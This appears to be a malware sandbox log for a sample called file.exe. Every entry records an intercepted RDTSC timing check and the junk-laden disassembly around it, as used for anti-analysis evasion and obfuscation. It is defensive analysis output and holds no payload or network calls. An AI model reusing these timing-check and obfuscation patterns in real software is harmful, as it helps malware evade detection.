                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110521D second address: 1105284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jo 00007FD648C0B446h 0x00000011 popad 0x00000012 jmp 00007FD648C0B452h 0x00000017 popad 0x00000018 nop 0x00000019 add di, 6D72h 0x0000001e lea eax, dword ptr [ebp+12498BC4h] 0x00000024 movzx edx, ax 0x00000027 nop 0x00000028 push esi 0x00000029 jmp 00007FD648C0B456h 0x0000002e pop esi 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD648C0B457h 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105284 second address: 11052C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648BC9AD9h 0x00000008 jmp 00007FD648BC9ACFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add dl, 0000004Ah 0x00000014 lea eax, dword ptr [ebp+12498B80h] 0x0000001a nop 0x0000001b jng 00007FD648BC9ACEh 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11052C6 second address: 11052D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11052D2 second address: 11052D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11052D8 second address: 11052DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11052DF second address: 10DFC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD648BC9AC8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 call 00007FD648BC9AD3h 0x00000027 push eax 0x00000028 mov ecx, 4A9302A8h 0x0000002d pop edi 0x0000002e pop ecx 0x0000002f mov dword ptr [ebp+122D2D84h], edx 0x00000035 call dword ptr [ebp+122D2B55h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD648BC9ACBh 0x00000042 push ecx 0x00000043 jno 00007FD648BC9AC6h 0x00000049 pop ecx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB19B second address: 10AB19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB19F second address: 10AB1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB1A5 second address: 10AB1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FD648C0B455h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB1C4 second address: 10AB1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E482 second address: 113E499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E784 second address: 113E788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E788 second address: 113E78C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E78C second address: 113E792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E792 second address: 113E797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147652 second address: 1147673 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD648BC9ACFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FD648BC9AC6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146139 second address: 1146157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FD648C0B452h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11462A1 second address: 11462AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11462AA second address: 11462B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146763 second address: 1146768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146768 second address: 1146793 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD648C0B450h 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11468EB second address: 11468FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146CD3 second address: 1146CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147515 second address: 1147519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E39 second address: 1145E43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E43 second address: 1145E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E47 second address: 1145E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E4D second address: 1145E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACDh 0x00000009 jnl 00007FD648BC9AC6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E64 second address: 1145E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FD648C0B457h 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145E89 second address: 1145E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FD648BC9AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AC06 second address: 114AC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AC0C second address: 114AC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A5CE second address: 114A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A5D2 second address: 114A5D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A749 second address: 114A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A74D second address: 114A760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A760 second address: 114A786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD648C0B45Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD648C0B452h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A8D1 second address: 114A8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A8D5 second address: 114A8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A8EF second address: 114A910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FD648BC9AC8h 0x00000012 pushad 0x00000013 jmp 00007FD648BC9ACAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114A910 second address: 114A922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FD648C0B446h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CBA1 second address: 114CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150540 second address: 1150544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150544 second address: 1150554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150554 second address: 115055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115055E second address: 11505A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FD648BC9AD9h 0x0000000f jc 00007FD648BC9ACEh 0x00000015 jg 00007FD648BC9AC6h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD648BC9AD8h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11505A8 second address: 11505AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115070A second address: 115070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11569A8 second address: 11569B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FD648C0B446h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155497 second address: 11554B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007FD648BC9AC6h 0x0000000f popad 0x00000010 pushad 0x00000011 jg 00007FD648BC9AC6h 0x00000017 pushad 0x00000018 popad 0x00000019 jc 00007FD648BC9AC6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11554B8 second address: 11554C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FD648C0B446h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155607 second address: 115565D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD648BC9AD6h 0x00000008 jmp 00007FD648BC9AD0h 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007FD648BC9ADCh 0x0000001a jmp 00007FD648BC9AD6h 0x0000001f jmp 00007FD648BC9AD8h 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155910 second address: 1155930 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648C0B446h 0x00000008 jmp 00007FD648C0B456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155930 second address: 1155946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155946 second address: 1155965 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FD648C0B455h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104BE5 second address: 1104C56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FD648BC9AD3h 0x0000000d mov dword ptr [ebp+122D2B03h], esi 0x00000013 pop ecx 0x00000014 mov ebx, dword ptr [ebp+12498BBFh] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FD648BC9AC8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 add eax, ebx 0x00000036 sub ecx, 0D1C026Fh 0x0000003c mov ecx, dword ptr [ebp+122D1A5Fh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FD648BC9AD2h 0x00000049 jnc 00007FD648BC9ACCh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104C56 second address: 1104C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD648C0B448h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104DF9 second address: 1104DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1104DFD second address: 1104E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007FD648C0B446h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155DA3 second address: 1155DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FD648BC9AC6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AD78 second address: 115AD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B164 second address: 115B168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B168 second address: 115B1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD648C0B451h 0x0000000f push ebx 0x00000010 jnc 00007FD648C0B446h 0x00000016 pop ebx 0x00000017 jmp 00007FD648C0B453h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B1B4 second address: 115B1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B302 second address: 115B308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B308 second address: 115B30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B30E second address: 115B31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B31B second address: 115B31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B31F second address: 115B323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632F7 second address: 1163301 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163301 second address: 1163311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161515 second address: 116151E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116151E second address: 1161522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161522 second address: 1161526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161865 second address: 1161883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B458h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161883 second address: 1161887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161887 second address: 11618A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD648C0B446h 0x00000008 jmp 00007FD648C0B44Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11618A1 second address: 11618C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD5h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jne 00007FD648BC9AC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11618C8 second address: 11618CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11618CD second address: 11618D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD648BC9ACCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161BAC second address: 1161BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 jmp 00007FD648C0B456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161BE2 second address: 1161BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161BE8 second address: 1161BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD648C0B450h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161BFE second address: 1161C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161C09 second address: 1161C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD648C0B446h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1161ED9 second address: 1161F0D instructions: 0x00000000 rdtsc 0x00000002 je 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jne 00007FD648BC9ADBh 0x00000012 push edi 0x00000013 jmp 00007FD648BC9ACAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162212 second address: 1162218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162218 second address: 1162239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648BC9AD3h 0x0000000b js 00007FD648BC9AC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11624C4 second address: 11624D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FD648C0B446h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162DB4 second address: 1162DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162DB8 second address: 1162DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD648C0B45Eh 0x0000000e push edx 0x0000000f jp 00007FD648C0B446h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B0B second address: 1168B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
